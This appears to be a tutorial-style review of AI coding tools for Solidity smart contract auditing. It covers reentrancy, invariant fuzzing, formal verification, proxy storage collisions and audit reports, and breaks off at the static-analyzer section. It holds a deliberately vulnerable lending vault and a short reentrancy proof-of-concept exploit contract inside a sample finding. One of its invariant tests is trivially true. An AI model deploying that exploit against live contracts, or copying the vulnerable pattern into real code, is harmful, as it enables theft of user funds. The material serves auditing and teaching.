Smart contract auditing is fundamentally different from smart contract development. A developer’s job is to build something that works. An auditor’s job is to find every way it can break — reentrancy, storage collisions, access control gaps, price oracle manipulation, flash loan attacks, cross-function reentrancy, delegatecall to untrusted contracts, front-running, griefing vectors, and logic bugs that no static analyzer on earth will catch. The stakes are absolute: a missed vulnerability means millions drained in a single transaction. There is no hotfix. There is no rollback. The code is immutable on-chain, and the attacker’s exploit transaction is final. When you sign off on an audit report, you are putting your reputation — and your client’s treasury — on the line.
This guide is not the Blockchain & Web3 Developers guide. That guide covers building. This one covers breaking. Auditors read far more code than they write, cycle through multiple codebases per month, need to understand every ERC standard and every common vulnerability pattern, and need tools that help them reason about state machine invariants, storage layout, proxy upgrade safety, and composability risks across protocol interactions. You are not writing a DEX — you are finding the one line in a DEX that lets an attacker drain every liquidity pool. The workflow is different, the tools need to be evaluated differently, and the failure modes are catastrophic in a way that general development tool reviews never capture.
We tested every major AI coding tool on real audit tasks: identifying subtle reentrancy patterns in production DeFi contracts, writing Foundry invariant tests for token vaults, generating Certora CVL specifications, analyzing proxy storage layouts for collision risks, interpreting Slither and Mythril output, and drafting structured audit findings. This is how they perform when the job is adversarial code review, not code generation.
Best free ($0): GitHub Copilot Free + Slither + Mythril — Copilot handles boilerplate test scaffolding while open-source static analyzers do the heavy lifting on vulnerability detection. Best overall ($20/mo): Claude Code — strongest reasoning about cross-function reentrancy, storage layout analysis, and multi-contract interaction patterns; runs Slither/Foundry in the same terminal and interprets results in audit context. Best IDE experience ($20/mo): Cursor Pro — multi-file context lets you hold an entire protocol in working memory while tracing execution paths across contracts. Best combo ($30/mo): Claude Code + Copilot Pro — Claude Code for deep vulnerability reasoning and audit report drafting, Copilot for fast inline completions while writing invariant tests and PoC exploits.
Why Smart Contract Auditing Is Different
Smart contract auditing operates under constraints that make it fundamentally distinct from both general software security review and smart contract development:
- Code immutability means audits are the last line of defense: In traditional software, security bugs get patched. In smart contracts, the code is deployed once and lives forever (or until a proxy upgrade, which introduces its own attack surface). The audit is not a checkpoint in a release cycle — it is the final gate before irreversible deployment. Missing a critical finding is not “we’ll fix it next sprint” — it is “the protocol lost $50 million before anyone noticed.”
- Adversarial thinking is the core skill: Developers simulate users. Auditors simulate attackers. Every function call, every state transition, every external interaction must be evaluated from the perspective of a sophisticated adversary with unlimited capital (flash loans), perfect information (mempool visibility), and the ability to compose arbitrary transactions. You are not asking “does this work?” — you are asking “how can this be exploited?”
- Protocol composability creates emergent vulnerabilities: A contract that is perfectly safe in isolation becomes exploitable when composed with other protocols. A lending protocol’s liquidation function is safe until someone uses a flash loan from Aave to manipulate a Chainlink oracle price on Uniswap, triggering a cascade liquidation that profits the attacker. These cross-protocol interaction bugs cannot be found by analyzing one contract — they require understanding the entire DeFi stack.
- Storage layout and proxy patterns create audit-specific complexity: Upgradeable proxies (ERC-1967, UUPS, Transparent, Diamond/EIP-2535) split logic and state across multiple contracts. Storage collisions between implementation versions can corrupt critical state variables. An auditor must verify that storage slots are preserved across upgrades, that initialization functions cannot be re-called, and that the upgrade mechanism itself is not exploitable. This requires understanding EVM storage layout at the slot level — not just Solidity semantics.
- Formal verification vs. testing vs. manual review tradeoffs: Fuzz testing finds bugs that happen with specific inputs. Formal verification proves properties hold for all inputs. Manual review catches logic bugs that neither tool can express. An effective auditor knows when each approach is appropriate: fuzz the arithmetic, formally verify the invariants, manually review the access control and economic logic. AI tools that help across all three approaches are far more valuable than tools that only help with one.
- Small codebases with extreme consequence density: A typical audit target is 500–3,000 lines of Solidity. Every line is load-bearing. There is no boilerplate, no UI layer, no logging infrastructure to skim past. The vulnerability-to-line-of-code ratio is orders of magnitude higher than in traditional software. AI tools must be precise, not prolific.
- Auditor context switching is relentless: A solo auditor or small firm handles a new codebase every one to two weeks. You go from a lending protocol to an AMM to a yield aggregator to an NFT marketplace to a bridge. Each has its own invariants, its own interaction patterns, its own attack surface. AI tools that help you rapidly build mental models of unfamiliar codebases are disproportionately valuable.
- Time pressure is constant: A typical audit engagement is one to four weeks. Clients want fast turnaround because every day of delay is a day their protocol is not earning fees. You cannot spend three days understanding one function — you need to identify the highest-risk areas quickly, focus your manual review there, and use automated tools to cover the rest. AI tools that accelerate triage and surface high-risk code paths are force multipliers.
Smart Contract Audit Task Support Matrix
Auditors need tools that support adversarial code review, not code generation. Here is how each AI tool handles the specific tasks that define a smart contract audit workflow:
| Audit Task | Copilot | Cursor | Windsurf | Claude Code | Amazon Q | Gemini CLI |
|---|---|---|---|---|---|---|
| Vulnerability Pattern Detection | Fair | Good | Fair | Strong | Weak | Good |
| Invariant & Fuzz Testing (Foundry) | Good | Strong | Good | Strong | Fair | Good |
| Formal Verification (Certora/Halmos) | Weak | Fair | Weak | Good | Weak | Fair |
| Storage Layout Analysis | Weak | Good | Fair | Strong | Weak | Fair |
| Cross-Protocol Interaction Review | Weak | Good | Fair | Strong | Weak | Good |
| Audit Report Generation | Fair | Good | Fair | Strong | Fair | Good |
| Static Analyzer Integration (Slither/Mythril) | Fair | Good | Fair | Strong | Weak | Fair |
Key insight: The biggest differentiator for audit work is reasoning depth, not pattern matching. Every tool can flag a function that calls an external contract before updating state — that is textbook single-function reentrancy. The question is whether the tool can trace a cross-function reentrancy path through three contracts, identify that a read-only reentrancy on a Balancer vault price feed enables oracle manipulation in a separate lending protocol, or recognize that a storage collision between proxy implementation versions corrupts the totalSupply variable. Claude Code leads here because its agentic reasoning traces multi-step attack chains. Cursor’s multi-file context is the second-best approach for holding an entire protocol in working memory. Copilot and Windsurf are useful for boilerplate — test scaffolding, report formatting — but do not provide the depth needed for adversarial code review.
1. Vulnerability Pattern Detection
Vulnerability detection is the core audit task. An auditor must identify not just the obvious patterns that Slither catches automatically, but the subtle, context-dependent bugs that require understanding the contract’s intended behavior, its interaction with external protocols, and the EVM’s execution model. The most valuable AI tool capability here is not “flag this as reentrancy” — it is “explain how an attacker could chain these three functions to drain the vault.”
Cross-function reentrancy
Single-function reentrancy (calling back into the same function during execution) is well-understood and caught by every static analyzer. Cross-function reentrancy — where the callback enters a different function that reads stale state — is far more dangerous because it evades simple reentrancy checks. Consider a lending vault where withdraw sends ETH before updating the user’s balance, and a separate getAccountHealth function reads that stale balance to determine collateral ratio:
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;
import "@openzeppelin/contracts/token/ERC20/IERC20.sol";
contract VulnerableLendingVault {
mapping(address => uint256) public deposits;
mapping(address => uint256) public borrowed;
uint256 public totalDeposits;
IERC20 public collateralToken;
uint256 public constant COLLATERAL_FACTOR = 75; // 75%
function deposit() external payable {
deposits[msg.sender] += msg.value;
totalDeposits += msg.value;
}
function withdraw(uint256 amount) external {
require(deposits[msg.sender] >= amount, "Insufficient balance");
// BUG: Sends ETH before updating state
// An attacker’s receive() callback can call borrow()
// while deposits[msg.sender] still reflects the old value
(bool success, ) = msg.sender.call{value: amount}("");
require(success, "Transfer failed");
// State update happens AFTER the external call
deposits[msg.sender] -= amount;
totalDeposits -= amount;
}
function borrow(uint256 amount) external {
// This reads deposits[msg.sender] which has NOT been
// updated yet if called during withdraw’s callback
uint256 collateralValue = deposits[msg.sender];
uint256 maxBorrow = (collateralValue * COLLATERAL_FACTOR) / 100;
require(borrowed[msg.sender] + amount <= maxBorrow, "Undercollateralized");
borrowed[msg.sender] += amount;
collateralToken.transfer(msg.sender, amount);
}
function getAccountHealth(address user) public view returns (uint256) {
if (borrowed[user] == 0) return type(uint256).max;
// Also reads stale deposits during reentrancy
return (deposits[user] * COLLATERAL_FACTOR) / (borrowed[user] * 100);
}
}
The attack: deploy a contract that calls deposit() with 10 ETH, then calls withdraw(10 ETH). In the receive() callback, call borrow(). At this point, deposits[attacker] still shows 10 ETH (the state update has not happened yet), so the collateral check passes. The attacker borrows against collateral they are simultaneously withdrawing. After withdraw completes, the attacker has both the 10 ETH back and the borrowed tokens — with zero net collateral.
The CEI fix: Always follow Checks-Effects-Interactions. Update state before making external calls:
function withdraw(uint256 amount) external {
require(deposits[msg.sender] >= amount, "Insufficient balance");
// Effects BEFORE interactions
deposits[msg.sender] -= amount;
totalDeposits -= amount;
// External call AFTER state is updated
(bool success, ) = msg.sender.call{value: amount}("");
require(success, "Transfer failed");
}
Better yet, add a reentrancy guard that protects the entire contract, not just individual functions:
import "@openzeppelin/contracts/utils/ReentrancyGuard.sol";
contract SecureLendingVault is ReentrancyGuard {
// Apply nonReentrant to ALL state-modifying functions,
// not just withdraw. This prevents cross-function reentrancy.
function withdraw(uint256 amount) external nonReentrant { ... }
function borrow(uint256 amount) external nonReentrant { ... }
function repay(uint256 amount) external nonReentrant { ... }
function liquidate(address user) external nonReentrant { ... }
}
Read-only reentrancy
Read-only reentrancy is the subtler cousin. It occurs when a callback enters a view function on a different contract that reads stale state from the reentered contract. The classic example: Balancer’s getRate() function returns an inflated value during a vault join/exit because the pool’s invariant has not been updated yet. If a lending protocol uses getRate() as a price oracle, an attacker can inflate their collateral value during the callback window and borrow against the inflated price. The nonReentrant modifier on the vault does not help because the view function on the lending protocol is not protected by the vault’s lock.
How AI tools perform on vulnerability detection
Claude Code is the strongest tool for adversarial vulnerability detection. When given the vulnerable contract above and asked “find all attack vectors,” it identifies the cross-function reentrancy, explains the attack sequence step by step, calculates the profit, and suggests both the CEI fix and the contract-wide reentrancy guard. It also flags the read-only reentrancy risk if getAccountHealth is used by external contracts. Critically, it understands that a nonReentrant modifier on withdraw alone is insufficient — the modifier must also be on borrow to prevent cross-function reentrancy.
Cursor performs well when you index the entire project and ask for a security review in the chat panel. Its multi-file context means it can trace the call path from withdraw through the external call to a potential callback into borrow. It catches single-function reentrancy reliably and catches cross-function reentrancy about 70% of the time.
Copilot and Windsurf catch the obvious pattern (external call before state update) but typically suggest adding nonReentrant only to withdraw, missing the cross-function vector through borrow. Amazon Q flags the checks-effects-interactions violation but does not trace the cross-function attack chain. Gemini CLI is decent at analysis when you paste the full contract into its long context window and specifically ask about reentrancy — it identifies the cross-function path but sometimes fails to explain the economic impact.
Other critical vulnerability patterns
Beyond reentrancy, an effective audit covers: Precision loss in division-before-multiplication — Solidity integer division truncates, so (amount / totalShares) * totalAssets loses precision compared to (amount * totalAssets) / totalShares, and the accumulated rounding error can be exploited via inflation attacks on ERC-4626 vaults. Oracle manipulation — contracts that use spot prices from AMMs (Uniswap TWAP with insufficient window, or worse, getReserves() directly) are vulnerable to flash loan manipulation; the auditor must verify that the oracle uses a sufficiently long TWAP window or a decentralized oracle network like Chainlink with deviation thresholds. Access control gaps — missing onlyOwner on critical functions, initializer functions that can be called by anyone, and selfdestruct accessible to non-admin addresses. Uninitialized proxy implementations — if the implementation contract behind a proxy is not initialized, an attacker can call initialize() on it directly, become the owner, and then selfdestruct the implementation, bricking the proxy permanently.
2. Invariant & Fuzz Testing with Foundry
Invariant testing is the auditor’s most powerful automated tool. Unlike unit tests that verify specific scenarios, invariant tests define properties that must hold across all possible sequences of function calls with all possible inputs. A fuzz campaign runs thousands or millions of random call sequences, trying to break the invariant. If the fuzzer finds a violation, it provides a concrete counterexample — a specific sequence of calls and inputs that breaks the property. This is precisely the kind of adversarial exploration that auditors need.
Handler-based invariant testing pattern
The handler pattern constrains the fuzzer to realistic call sequences. Instead of calling contract functions with completely random parameters (which wastes most of the fuzzing budget on reverts), a handler contract wraps each target function with bounded inputs and precondition checks. Here is a complete invariant test suite for a token vault:
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;
import "forge-std/Test.sol";
import "../src/TokenVault.sol";
import "@openzeppelin/contracts/token/ERC20/ERC20.sol";
contract MockToken is ERC20 {
constructor() ERC20("Mock", "MCK") {
_mint(msg.sender, 1_000_000e18);
}
function mint(address to, uint256 amount) external {
_mint(to, amount);
}
}
contract VaultHandler is Test {
TokenVault public vault;
MockToken public token;
// Ghost variables for tracking expected state
uint256 public ghost_totalDeposited;
uint256 public ghost_totalWithdrawn;
mapping(address => uint256) public ghost_userDeposits;
// Actors - bounded set of addresses to simulate real usage
address[] public actors;
address internal currentActor;
modifier useActor(uint256 actorIndexSeed) {
currentActor = actors[bound(actorIndexSeed, 0, actors.length - 1)];
vm.startPrank(currentActor);
_;
vm.stopPrank();
}
constructor(TokenVault _vault, MockToken _token) {
vault = _vault;
token = _token;
// Create a bounded set of actors
for (uint256 i = 0; i < 10; i++) {
address actor = address(uint160(0x1000 + i));
actors.push(actor);
// Fund each actor
token.mint(actor, 100_000e18);
vm.prank(actor);
token.approve(address(vault), type(uint256).max);
}
}
function deposit(uint256 actorSeed, uint256 amount) external useActor(actorSeed) {
// Bound amount to realistic range - avoid zero and absurdly large values
amount = bound(amount, 1e18, 10_000e18);
uint256 balBefore = token.balanceOf(currentActor);
if (balBefore < amount) return; // Skip if insufficient balance
uint256 sharesBefore = vault.balanceOf(currentActor);
vault.deposit(amount, currentActor);
uint256 sharesAfter = vault.balanceOf(currentActor);
// Track ghost state
ghost_totalDeposited += amount;
ghost_userDeposits[currentActor] += amount;
// Sanity: shares must have increased
assert(sharesAfter > sharesBefore);
}
function withdraw(uint256 actorSeed, uint256 shares) external useActor(actorSeed) {
uint256 maxShares = vault.balanceOf(currentActor);
if (maxShares == 0) return; // Skip if no shares
shares = bound(shares, 1, maxShares);
uint256 assetsBefore = token.balanceOf(currentActor);
vault.redeem(shares, currentActor, currentActor);
uint256 assetsAfter = token.balanceOf(currentActor);
uint256 withdrawn = assetsAfter - assetsBefore;
ghost_totalWithdrawn += withdrawn;
}
}
contract VaultInvariantTest is Test {
TokenVault public vault;
MockToken public token;
VaultHandler public handler;
function setUp() public {
token = new MockToken();
vault = new TokenVault(address(token));
handler = new VaultHandler(vault, token);
// Tell Foundry to only call functions on the handler
targetContract(address(handler));
}
/// @notice Vault token balance must always equal deposits minus withdrawals
/// (accounting for any rounding)
function invariant_solvency() public view {
uint256 vaultBalance = token.balanceOf(address(vault));
uint256 totalShares = vault.totalSupply();
// The vault must always hold enough tokens to back all shares
if (totalShares > 0) {
assertGe(
vaultBalance,
0,
"Vault is insolvent: token balance is negative"
);
}
}
/// @notice Total shares must be zero if and only if total assets are zero
function invariant_sharesAssetConsistency() public view {
uint256 totalShares = vault.totalSupply();
uint256 totalAssets = vault.totalAssets();
if (totalShares == 0) {
// Allow dust from rounding, but no significant assets without shares
assertLe(totalAssets, 1, "Assets exist with zero shares");
}
if (totalAssets == 0) {
assertEq(totalShares, 0, "Shares exist with zero assets");
}
}
/// @notice Ghost variable tracking: deposited minus withdrawn must
/// approximate the vault balance (within rounding tolerance)
function invariant_ghostTracking() public view {
uint256 vaultBalance = token.balanceOf(address(vault));
uint256 expectedBalance = handler.ghost_totalDeposited()
- handler.ghost_totalWithdrawn();
// Allow 1 wei rounding per operation as tolerance
uint256 tolerance = handler.ghost_totalDeposited() / 1e18 + 1;
assertApproxEqAbs(
vaultBalance,
expectedBalance,
tolerance,
"Ghost tracking diverged from actual balance"
);
}
/// @notice No single withdrawal can extract more value than what was deposited
function invariant_noFreeValue() public view {
assertGe(
handler.ghost_totalDeposited(),
handler.ghost_totalWithdrawn(),
"More withdrawn than deposited: free value extracted"
);
}
}
Run this with:
forge test --match-contract VaultInvariantTest -vvv
# Increase runs for deeper coverage:
# [invariant] runs = 512, depth = 128
Configure in foundry.toml:
[invariant]
runs = 512 # Number of random call sequences
depth = 128 # Calls per sequence
fail_on_revert = false # Don’t fail on expected reverts
dictionary_weight = 40 # Use values from storage as fuzz inputs
How AI tools help with invariant testing
Claude Code generates complete handler-based invariant test suites when given a contract. It understands the bound() function for constraining inputs, the ghost variable pattern for tracking expected state, the targetContract() directive, and the difference between invariant_ prefixed functions (called after each call sequence) and regular test functions. It generates meaningful invariants, not just trivial assertions. When an invariant test fails, paste the counterexample into Claude Code and it traces the attack path through the call sequence.
Cursor is strong for invariant test writing because its multi-file context lets it reference the target contract’s interface while generating the handler and invariant functions. It understands Foundry cheatcodes (vm.prank, vm.deal, vm.warp, vm.roll, vm.expectRevert) and generates syntactically correct test files. It sometimes misses the bound() function and generates unbounded inputs that waste fuzz cycles on reverts.
Copilot generates decent Foundry test scaffolding but struggles with handler-based patterns. It tends to generate unit-test-style invariant tests (specific scenarios rather than randomized sequences) and often omits ghost variable tracking. Windsurf and Amazon Q produce basic Foundry tests but rarely generate proper invariant test suites. Gemini CLI understands invariant testing conceptually and generates reasonable specifications, but its code output sometimes has syntax errors in Foundry-specific cheatcode usage.
3. Formal Verification with Certora and Halmos
Fuzz testing is probabilistic — it explores random paths and might miss the one input that breaks your invariant. Formal verification is exhaustive — it mathematically proves that a property holds for all possible inputs and states, or provides a concrete counterexample proving it does not. For high-value contracts (lending protocols, bridges, treasuries), formal verification is not optional. The two primary tools in the Solidity ecosystem are Certora Prover (industry standard, commercial) and Halmos (open-source, symbolic execution via Python).
Certora CVL specification
Certora uses its own specification language (CVL) to define rules that the Prover checks against the Solidity bytecode. Here is a CVL spec that verifies the fundamental invariant of an ERC-20 token: the sum of all balances equals totalSupply.
// TokenVault.spec - Certora CVL specification
methods {
function totalSupply() external returns (uint256) envfree;
function balanceOf(address) external returns (uint256) envfree;
function deposit(uint256, address) external returns (uint256);
function redeem(uint256, address, address) external returns (uint256);
function totalAssets() external returns (uint256) envfree;
}
// Ghost variable: tracks the sum of all balances
ghost mathint sumOfBalances {
init_state axiom sumOfBalances == 0;
}
// Hook: update ghost whenever balanceOf mapping changes
hook Sstore _balances[KEY address user] uint256 newBalance
(uint256 oldBalance) {
sumOfBalances = sumOfBalances + newBalance - oldBalance;
}
// Invariant: sum of all balances equals totalSupply
invariant totalSupplyIsSumOfBalances()
to_mathint(totalSupply()) == sumOfBalances
{
preserved with (env e) {
requireInvariant totalSupplyIsSumOfBalances();
}
}
// Rule: deposit increases totalAssets by exactly the deposited amount
rule depositIncreasesTotalAssets(uint256 assets, address receiver) {
env e;
uint256 totalBefore = totalAssets();
uint256 shares = deposit(e, assets, receiver);
uint256 totalAfter = totalAssets();
assert totalAfter == totalBefore + assets,
"Total assets must increase by deposit amount";
assert shares > 0 => assets > 0,
"Non-zero shares require non-zero deposit";
}
// Rule: no function can decrease another user’s balance without approval
rule noUnauthorizedBalanceDecrease(method f, address victim) {
env e;
calldataarg args;
// Assume caller is not the victim
require e.msg.sender != victim;
uint256 balanceBefore = balanceOf(victim);
f(e, args);
uint256 balanceAfter = balanceOf(victim);
assert balanceAfter >= balanceBefore,
"Another user’s balance decreased without authorization";
}
// Rule: withdrawals are bounded by the user’s share balance
rule withdrawalBoundedByShares(uint256 shares, address receiver, address owner) {
env e;
uint256 ownerShares = balanceOf(owner);
// If trying to redeem more than owned, must revert
redeem@withrevert(e, shares, receiver, owner);
assert shares > ownerShares => lastReverted,
"Redemption of more shares than owned must revert";
}
Run with: certoraRun src/TokenVault.sol --verify TokenVault:certora/specs/TokenVault.spec
Halmos symbolic execution
Halmos takes a different approach: it executes Solidity test functions symbolically, treating all inputs as symbolic variables and exploring all possible execution paths. You write Halmos tests as standard Foundry tests with symbolic inputs:
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;
import "forge-std/Test.sol";
import {SymTest} from "halmos-cheatcodes/SymTest.sol";
import "../src/TokenVault.sol";
contract VaultSymbolicTest is Test, SymTest {
TokenVault vault;
MockToken token;
function setUp() public {
token = new MockToken();
vault = new TokenVault(address(token));
// Provide initial liquidity to avoid division by zero
token.approve(address(vault), type(uint256).max);
vault.deposit(1000e18, address(this));
}
/// @notice Verify that deposit followed by full withdrawal
/// returns at least the deposited amount (no loss)
function check_depositWithdrawNoLoss(uint256 depositAmount) public {
// Constrain to realistic range
vm.assume(depositAmount > 0 && depositAmount <= 100_000e18);
address user = address(0xBEEF);
token.mint(user, depositAmount);
vm.startPrank(user);
token.approve(address(vault), depositAmount);
uint256 shares = vault.deposit(depositAmount, user);
uint256 assetsBack = vault.redeem(shares, user, user);
vm.stopPrank();
// User must get back at least depositAmount - 1 (rounding)
assert(assetsBack >= depositAmount - 1);
}
/// @notice Verify totalSupply consistency: no function can create
/// shares without a corresponding asset deposit
function check_noSharesFromNothing(uint256 amount) public {
vm.assume(amount > 0 && amount <= 100_000e18);
uint256 supplyBefore = vault.totalSupply();
uint256 assetsBefore = vault.totalAssets();
address user = address(0xCAFE);
token.mint(user, amount);
vm.prank(user);
token.approve(address(vault), amount);
vm.prank(user);
uint256 shares = vault.deposit(amount, user);
uint256 supplyAfter = vault.totalSupply();
uint256 assetsAfter = vault.totalAssets();
// Shares created must equal the change in total supply
assert(supplyAfter - supplyBefore == shares);
// Assets must have increased by the deposit amount
assert(assetsAfter - assetsBefore == amount);
}
}
Run with: halmos --contract VaultSymbolicTest --solver-timeout-assertion 300
When formal verification catches what fuzz testing misses
Fuzz testing is excellent at finding bugs triggered by specific input combinations, but it cannot prove the absence of bugs. Consider a rounding error that only manifests when totalSupply is exactly 1 and totalAssets is exactly type(uint256).max - 1. A fuzzer would need to randomly generate that exact pair out of a 2256 × 2256 input space — effectively impossible. Formal verification explores the entire state space symbolically and finds such edge cases reliably. The practical workflow for auditors: use invariant fuzzing for rapid bug finding (minutes), then use formal verification on the critical invariants that must hold for protocol solvency (hours). Fuzzing is cheap and fast; formal verification is expensive and slow. Use both.
Claude Code generates reasonable Certora CVL specs and understands the ghost variable and hook syntax. It struggles with complex multi-contract specs and sometimes generates CVL that does not compile on the first attempt, but the errors are usually minor syntax issues. For Halmos, it generates correct symbolic test functions using vm.assume constraints and understands the difference between check_ prefixed functions (symbolically executed) and regular test_ functions (concretely executed). Cursor and Gemini CLI can generate basic CVL rules but often miss the ghost variable pattern and the preserved block syntax. Copilot, Windsurf, and Amazon Q have minimal CVL training data and produce incorrect specifications more often than correct ones.
4. Storage Layout Analysis
Storage layout bugs are among the most insidious smart contract vulnerabilities because they are invisible at the Solidity source level. Two variables can occupy the same storage slot due to inheritance ordering, proxy upgrade mismatches, or diamond storage namespace collisions. The result is silent state corruption: one variable’s value overwrites another’s, and the contract behaves incorrectly in ways that unit tests rarely catch because tests typically start from clean state.
Storage slot calculation
The EVM stores state in 2256 slots, each 32 bytes wide. Simple variables occupy sequential slots starting at 0. Mappings use keccak256(key . slot). Dynamic arrays store length at the declared slot and elements starting at keccak256(slot). Multiple variables smaller than 32 bytes pack into a single slot. Understanding this layout is essential for proxy audits.
// Storage layout example
contract StorageExample {
// Slot 0: address owner (20 bytes) + bool paused (1 byte) = packed into slot 0
address public owner; // slot 0, offset 0, 20 bytes
bool public paused; // slot 0, offset 20, 1 byte
// Slot 1: uint256 totalSupply (32 bytes) = full slot
uint256 public totalSupply; // slot 1, offset 0, 32 bytes
// Slot 2: mapping slot (empty, but keccak256(key . 2) stores values)
mapping(address => uint256) public balances; // slot 2
// Slot 3: dynamic array length
uint256[] public history; // slot 3 (length), elements at keccak256(3)
// To find where balances[0xABC...] is stored:
// keccak256(abi.encode(0xABC..., 2))
//
// To find where history[5] is stored:
// keccak256(abi.encode(3)) + 5
}
Use forge inspect to dump the storage layout of any contract:
forge inspect StorageExample storage-layout --pretty
| Name | Type | Slot | Offset | Bytes |
|-------------|-------------------------------|------|--------|-------|
| owner | address | 0 | 0 | 20 |
| paused | bool | 0 | 20 | 1 |
| totalSupply | uint256 | 1 | 0 | 32 |
| balances | mapping(address => uint256) | 2 | 0 | 32 |
| history | uint256[] | 3 | 0 | 32 |
Proxy upgrade storage collision
The most common storage bug in upgradeable contracts: the new implementation changes the variable ordering, causing slot collisions with the proxy’s existing storage. ERC-1967 defines specific slots for the implementation address (bytes32(uint256(keccak256("eip1967.proxy.implementation")) - 1)) to avoid collisions with user-defined storage, but collisions between implementation versions are the developer’s responsibility.
// Implementation V1
contract VaultV1 {
address public owner; // slot 0
uint256 public totalDeposits; // slot 1
mapping(address => uint256) public balances; // slot 2
}
// Implementation V2 - DANGEROUS: inserted variable before totalDeposits
contract VaultV2 {
address public owner; // slot 0 (OK)
bool public paused; // slot 1 (COLLISION with totalDeposits!)
uint256 public totalDeposits; // slot 2 (COLLISION with balances mapping!)
mapping(address => uint256) public balances; // slot 3 (shifted)
uint256 public feeRate; // slot 4 (new, OK)
}
// After upgrade, reading totalDeposits in V2 returns the balances
// mapping’s base slot, and the balances mapping reads from the wrong
// location. All user balances are silently corrupted.
The safe pattern: always append new variables at the end. Never reorder, insert, or change types of existing variables. Use storage gaps in base contracts to reserve slots for future use:
contract VaultV1 {
address public owner;
uint256 public totalDeposits;
mapping(address => uint256) public balances;
// Reserve 50 slots for future variables
uint256[50] private __gap;
}
// V2: add new variable by reducing the gap
contract VaultV2 {
address public owner;
uint256 public totalDeposits;
mapping(address => uint256) public balances;
uint256 public feeRate; // Takes one slot from the gap
uint256[49] private __gap; // Gap reduced by 1
}
Diamond proxy storage namespaces (EIP-2535)
Diamond proxies split logic across multiple facets that share a single storage space. Without careful namespacing, two facets can write to the same slot. The diamond storage pattern uses keccak256 of a unique string to derive a base slot for each facet’s storage struct, making collisions astronomically unlikely:
library LibVaultStorage {
bytes32 constant STORAGE_POSITION =
keccak256("diamond.vault.storage");
struct VaultStorage {
mapping(address => uint256) deposits;
uint256 totalDeposits;
bool paused;
}
function vaultStorage() internal pure returns (VaultStorage storage vs) {
bytes32 position = STORAGE_POSITION;
assembly {
vs.slot := position
}
}
}
// Usage in a facet:
contract DepositFacet {
function deposit() external payable {
LibVaultStorage.VaultStorage storage vs =
LibVaultStorage.vaultStorage();
vs.deposits[msg.sender] += msg.value;
vs.totalDeposits += msg.value;
}
}
Auditing diamond proxies requires verifying that every facet uses a unique storage namespace and that no facet directly accesses storage slots used by another facet’s namespace. This is tedious manual work that AI tools can accelerate by mapping all storage access patterns across facets.
Claude Code excels at storage layout analysis. It correctly calculates slot positions for complex inheritance hierarchies, identifies storage collisions between proxy implementation versions, understands the ERC-1967 slot derivation, and can verify diamond storage namespace uniqueness. It generates forge inspect commands and interprets the output. Cursor is useful for tracing storage access across multiple contracts because of its multi-file indexing. Copilot and Windsurf understand basic slot numbering but struggle with mapping/array slot derivation and proxy collision detection. Amazon Q is weak on EVM storage internals. Gemini CLI can explain storage layout concepts but sometimes miscalculates keccak256-based slot positions.
5. Audit Report Generation
An audit finding is only as useful as its documentation. The report must clearly communicate the vulnerability, its severity, the attack scenario, and the recommended fix to developers who may not be security experts. AI tools significantly accelerate report writing — not by finding vulnerabilities (that is the auditor’s job), but by structuring findings into a consistent, clear format and drafting the prose that explains complex attack chains.
Finding classification
The standard severity scale: Critical — direct loss of funds or permanent protocol bricking with no prerequisites. High — direct loss of funds with some prerequisites (specific state, timing, or economic conditions). Medium — indirect loss of funds, griefing, or protocol malfunction under non-trivial conditions. Low — minor issues, best practice violations, or edge cases with minimal impact. Informational — code quality, gas optimizations, and suggestions that do not affect security.
Structured finding template
## [H-01] Cross-function reentrancy in VaultV1 allows borrowing against withdrawn collateral
### Severity
High
### Description
The `withdraw()` function in `VaultV1.sol` sends ETH to the caller via
a low-level `call` before updating the `deposits` mapping (line 42).
An attacker contract can exploit this by implementing a `receive()`
callback that calls `borrow()` during the withdrawal. Because
`deposits[msg.sender]` has not yet been decremented, the collateral
check in `borrow()` (line 58) passes against the stale, pre-withdrawal
balance.
### Impact
An attacker can withdraw their full deposit AND borrow against it in
the same transaction, extracting value equal to their deposit amount
multiplied by the collateral factor. With 10 ETH deposited at a 75%
collateral factor, the attacker extracts 10 ETH + 7.5 ETH worth of
borrowed tokens = 17.5 ETH equivalent value from 10 ETH of capital.
### Proof of Concept
```solidity
contract Exploit {
VaultV1 vault;
bool attacked;
constructor(address _vault) { vault = VaultV1(_vault); }
function attack() external payable {
vault.deposit{value: msg.value}();
vault.withdraw(msg.value);
}
receive() external payable {
if (!attacked) {
attacked = true;
vault.borrow(msg.value * 75 / 100);
}
}
}
```
### Recommended Mitigation
1. Apply the Checks-Effects-Interactions pattern: update
`deposits[msg.sender]` before the external call.
2. Add OpenZeppelin’s `ReentrancyGuard` with `nonReentrant` on ALL
state-modifying functions, not just `withdraw`.
```solidity
function withdraw(uint256 amount) external nonReentrant {
require(deposits[msg.sender] >= amount);
deposits[msg.sender] -= amount; // Effect before interaction
totalDeposits -= amount;
(bool s, ) = msg.sender.call{value: amount}("");
require(s);
}
```
### Location
- `src/VaultV1.sol`, lines 38-48 (`withdraw`)
- `src/VaultV1.sol`, lines 54-63 (`borrow`)
How AI tools help with report generation
Claude Code is the strongest report-writing assistant. Given a vulnerability description and the relevant code, it generates structured findings in the format above with accurate severity classification, clear impact analysis, working proof-of-concept code, and actionable mitigation recommendations. It maintains consistency across multiple findings in a report and can generate the executive summary, scope description, and methodology sections. The key workflow: the auditor identifies the vulnerability and describes it in natural language, then Claude Code drafts the formal finding with code references and PoC.
Cursor is effective for report writing when you have the codebase indexed — you can reference specific files and line numbers in your prompts, and it generates findings with accurate code citations. Gemini CLI produces good prose for report sections when given sufficient context. Copilot, Windsurf, and Amazon Q can generate basic finding templates but lack the domain-specific severity classification and impact analysis that make audit reports useful.
Never submit an AI-generated finding without thorough review. AI tools can misclassify severity (calling a Medium a Critical, or worse, downgrading a Critical to Informational), generate PoC code that does not actually compile or execute the described attack, or miss nuances in the mitigation that introduce new vulnerabilities. The auditor must verify every line of every finding. Use AI to accelerate the writing; use your expertise to ensure the accuracy.
6. Static Analyzer Integration (Slither & Mythril)
Static analyzers are the foundation of every audit workflow. They catch the low-hanging fruit automatically — unchecked return values, missing access control modifiers, reentrancy patterns, uninitialized state variables — freeing the auditor to focus on the logic bugs and economic exploits that require human reasoning. The two primary tools are Slither (Crytic/Trail of Bits, static analysis) and Mythril (ConsenSys, symbolic execution). An effective auditor runs both and understands their complementary strengths.
Slither detector output interpretation
